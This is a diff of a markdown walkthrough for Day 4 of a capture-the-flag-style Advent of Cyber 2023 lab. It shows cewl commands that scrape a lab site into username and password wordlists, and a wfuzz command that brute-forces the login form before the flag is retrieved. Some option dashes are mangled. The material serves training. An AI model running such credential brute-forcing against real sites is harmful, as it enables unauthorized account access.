W4W1R3/Advent-Of-Cyber-2023-Walkthroughs/Day 4.md

 ## Day 4 Task:

-1. What is the correct username and password combination?
+### 1. What is the correct username and password combination?
 Format username: password

-    With CewlGenerate a list of Usernames with the Command — `cewl -d 0 -m 5 -w usernames.txt http://MACHINE-IP/team.php — lowercase`
+With CewlGenerate a list of Usernames with the Command —

+   `cewl -d 0 -m 5 -w usernames.txt http://MACHINE-IP/team.php — lowercase`

-    Again with CewlGenerate a list of Passwords with the Command — `cewl -d 2 -m 5 -w passwords.txt http://MACHINE-IP — with-numbers`
+    Again with CewlGenerate a list of Passwords with the Command —

+    `cewl -d 2 -m 5 -w passwords.txt http://MACHINE-IP — with-numbers`

     Now bruteforce the Credentials using wfuzz with the command —

     `wfuzz -c -z file,usernames.txt -z file,passwords.txt — hs “Please enter the correct credentials” -u http://MACHINE-IP/login.php -d “username=FUZZ&password=FUZ2Z”`

+### 2. What is the Flag?

+Log in and click on the Email with the Subject “Confidential Message”